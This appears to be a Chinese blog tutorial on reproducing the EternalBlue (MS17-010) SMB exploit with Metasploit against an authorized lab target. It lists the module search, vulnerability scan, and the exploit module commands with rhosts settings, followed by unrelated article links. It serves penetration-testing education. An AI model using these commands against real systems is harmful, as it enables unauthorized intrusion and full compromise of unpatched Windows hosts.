当前位置: 首页 > news >正文

msf复现永恒之蓝

永恒之蓝(EternalBlue)是利用 Windows 系统的 SMB 协议漏洞(MS17-010)来获取系统最高权限的漏洞,利用 Metasploit 框架(MSF)复现该漏洞是一个复杂且具有一定风险的操作,必须在合法合规的环境下进行,如在经过授权的靶场环境,以下是具体复现步骤:

前期准备

  • 攻击机:安装有 Metasploit 工具的 Kali Linux 系统,开启并联网,确保 Metasploit 能正常使用。
  • 靶机:存在 MS17-010 漏洞的 Windows 系统,如未打补丁的 Windows 7、Windows Server 2008 R2 等,关闭防火墙和杀毒软件(仅用于测试环境),并记录其 IP 地址,假设为 192.168.244.139 。
  • 网络环境:攻击机和靶机处于同一局域网,或可以相互通信.

 

利用 MSF 复现永恒之蓝漏洞

在 Kali Linux 的终端中输入msfconsole,回车启动 Metasploit 框架。

搜索相关模块:输入search ms17-010,搜索与 MS17-010 漏洞相关的模块。在搜索结果中,主要关注auxiliary/scanner/smb/smb_ms17_010(扫描模块)和exploit/windows/smb/ms17_010_eternalblue(攻击模块) 。

扫描目标主机是否存在漏洞

使用扫描模块:输入use auxiliary/scanner/smb/smb_ms17_010,使用该扫描模块。

查看缺少的信息:输入show options查看缺少的信息

设置目标主机:输入set rhosts 192.168.244.139(将 IP 地址替换为靶机的实际 IP),设置要扫描的目标主机。

运行扫描:输入run,开始扫描目标主机是否存在 MS17-010 漏洞。如果目标主机存在漏洞,扫描结果会有相应提示。

调用攻击模块:输入use exploit/windows/smb/ms17_010_eternalblue,调用永恒之蓝的攻击模块。

配置攻击模块:输入show options查看攻击模块的配置项,然后输入set rhosts 192.168.244.139设置目标机的 IP 地址。

执行攻击:输入run运行攻击模块,若成功,会与 Windows 7 系统目标机建立连接。

 

这样就入侵成功了,后续需要进行什么操作可自行选择 

 

http://www.xdnf.cn/news/1095337.html

相关文章:

  • 不止于快:金士顿XS2000移动固态硬盘如何重塑你的数字生活
  • 32多串300A保护板测试仪:新能源电池安全的核心守护者
  • 服务器组件与 Actions:重塑 React 数据交互
  • Linux 内核日志中常见错误
  • 前端开发资源压缩与请求优化
  • 编译OpenHarmony-4.0-Release RK3566 报错
  • 鸿蒙开发文档
  • Linux入门篇学习——Linux 工具之 make 工具和 makefile 文件
  • 观成科技:基于自监督学习技术的恶意加密流量检测方案
  • 论文精读(一)| 量子计算系统软件研究综述
  • 图书管理系统(完结版)
  • Redis数据安全性分析
  • 心智模式:觉察思维定势,突破决策盲区
  • 【QT】文件、多线程、网络相关内容
  • 【PyTorch】PyTorch中数据准备工作(AI生成)
  • C++并发编程-11. C++ 原子操作和内存模型
  • 继承与多态:面向对象编程的两大支柱
  • AI Agent:我的第一个Agent项目
  • 树莓派免密登录(vs code/cursor)
  • 一天两道力扣(3)
  • 【计算机组成原理——知识点总结】-(总线与输入输出设备)-学习笔记总结-复习用
  • AI大模型:(二)4.2 文生图训练实践-真人写实生成
  • Linux的`if test`和`if [ ]中括号`的取反语法比较 笔记250709
  • kbmMemTable Pro 7.82 Delphi 11 源代码
  • 【牛客刷题】小欧的选数乘积
  • 【 MySQL】一点点相关的记录
  • Wireshark抓包实验之TCP连接
  • C++最小生成树算法详解
  • 【图像处理基石】图像超分辨率有哪些研究进展值得关注?
  • 【具身智能】本地实时语音识别kaldi在正点原子RK3588上部署